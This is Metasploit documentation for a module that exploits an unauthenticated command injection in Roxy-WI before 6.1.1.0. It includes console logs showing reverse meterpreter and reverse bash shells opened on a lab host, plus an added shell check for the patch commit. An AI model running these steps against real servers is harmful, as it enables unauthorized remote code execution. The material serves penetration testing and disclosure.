metasploit-gs/documentation/modules/exploit/linux/http/roxy_wi_exec.md
2022-07-22 12:24:26 +00:00

Vulnerable Application

Description

This module exploits an unauthenticated command injection vulnerability in Roxy-WI prior to version 6.1.1.0. Successful exploitation results in remote code execution under the context of the web server user.

Technical details about the vulnerability can be found here. The original GitHub advisory can be found at https://github.com/hap-wi/roxy-wi/security/advisories/GHSA-53r2-mq99-f532. The patch can be found at https://github.com/hap-wi/roxy-wi/commit/82666df1e60c45dd6aa533b01a392f015d32f755

Setup

Roxy-WI requires Python and a web server to run. Visit the following URL for the required Python version and other packages.

https://roxy-wi.org/installation.py

git clone https://github.com/hap-wi/roxy-wi.git /var/www/haproxy-wi
# The remaining paths are relative to /var/www
cd /var/www
chmod +x haproxy-wi/app/*.py
sudo ./haproxy-wi/app/create_db.py
chown -R www-data:www-data haproxy-wi
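
An added defensive check, not part of the module or of the Roxy-WI project: for an installation cloned from git as above, it reports whether the checkout contains the patch commit cited in the Description. The function name `roxy_wi_patch_status` and its three output words are assumptions made for this example.

```shell
#!/bin/sh
# Added example: does a git-cloned Roxy-WI tree contain the fix commit?
# FIX_COMMIT is the patch commit cited in the Description section.
FIX_COMMIT=82666df1e60c45dd6aa533b01a392f015d32f755

# roxy_wi_patch_status DIR [COMMIT]   (hypothetical helper name)
# Prints: patched | vulnerable | unknown
# Returns: 0 = patched, 1 = vulnerable, 2 = cannot decide
# Usage:   roxy_wi_patch_status /var/www/haproxy-wi
roxy_wi_patch_status() {
    rw_dir=$1
    rw_commit=${2:-$FIX_COMMIT}

    # Not a git repository (missing path, tarball or package install).
    if ! git -C "$rw_dir" rev-parse --git-dir >/dev/null 2>&1; then
        echo unknown
        return 2
    fi

    # The fix commit object is not present locally: shallow clone, or a
    # clone made before the fix and never fetched. History alone cannot
    # tell these apart, so report unknown rather than guess.
    if ! git -C "$rw_dir" cat-file -e "${rw_commit}^{commit}" 2>/dev/null; then
        echo unknown
        return 2
    fi

    # merge-base --is-ancestor exits 0 when COMMIT is HEAD or one of its
    # ancestors, 1 when it is not, and another value on error.
    rw_rc=0
    git -C "$rw_dir" merge-base --is-ancestor "$rw_commit" HEAD 2>/dev/null || rw_rc=$?
    case $rw_rc in
        0) echo patched;    return 0 ;;
        1) echo vulnerable; return 1 ;;
        *) echo unknown;    return 2 ;;
    esac
}
```

An `unknown` result means the version has to be established another way, for example by comparing the installed version against 6.1.1.0.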

Verification Steps

  1. Install the application
  2. Start msfconsole
  3. Do: use exploit/linux/http/roxy_wi_exec
  4. Set RHOST
  5. Set LHOST
  6. Run exploit
  7. Do: run
  8. You should get a shell.
  9. Verify that you are getting a meterpreter session.

Options

Set TARGETURI if Roxy-WI is installed at a custom path.

TARGETURI

The base path to Roxy-WI. The default value is /

Scenarios

msf6 > use exploit/linux/http/roxy_wi_exec 
[*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(linux/http/roxy_wi_exec) > set RHOST 192.168.56.116
RHOST => 192.168.56.116
msf6 exploit(linux/http/roxy_wi_exec) > set RPORT 443
RPORT => 443
msf6 exploit(linux/http/roxy_wi_exec) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf6 exploit(linux/http/roxy_wi_exec) > run

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.56.116:443 is vulnerable!
[+] The target is vulnerable. The device responded to exploitation with a 200 OK and test command successfully executed.
[*] Generating payload.
[*] Trying to detect command injection vulnerability.
[*] Sending stage (40164 bytes) to 192.168.56.116
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.116:37394) at 2022-07-21 13:49:23 +0300
[+] Exploit successfully executed.

meterpreter > pwd
/var/www/haproxy-wi/app

You can also use cmd payloads.

msf6 > use exploit/linux/http/roxy_wi_exec 
[*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(linux/http/roxy_wi_exec) > set RHOST 192.168.56.116
RHOST => 192.168.56.116
msf6 exploit(linux/http/roxy_wi_exec) > set RPORT 443
RPORT => 443
msf6 exploit(linux/http/roxy_wi_exec) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf6 exploit(linux/http/roxy_wi_exec) > set payload cmd/unix/reverse_bash
payload => cmd/unix/reverse_bash
msf6 exploit(linux/http/roxy_wi_exec) > run

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.56.116:443 is vulnerable!
[+] The target is vulnerable. The device responded to exploitation with a 200 OK and test command successfully executed.
[*] Generating payload.
[*] Trying to detect command injection vulnerability.
[*] Command shell session 2 opened (192.168.56.1:4444 -> 192.168.56.116:37396) at 2022-07-21 13:50:23 +0300
[+] Exploit successfully executed.

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)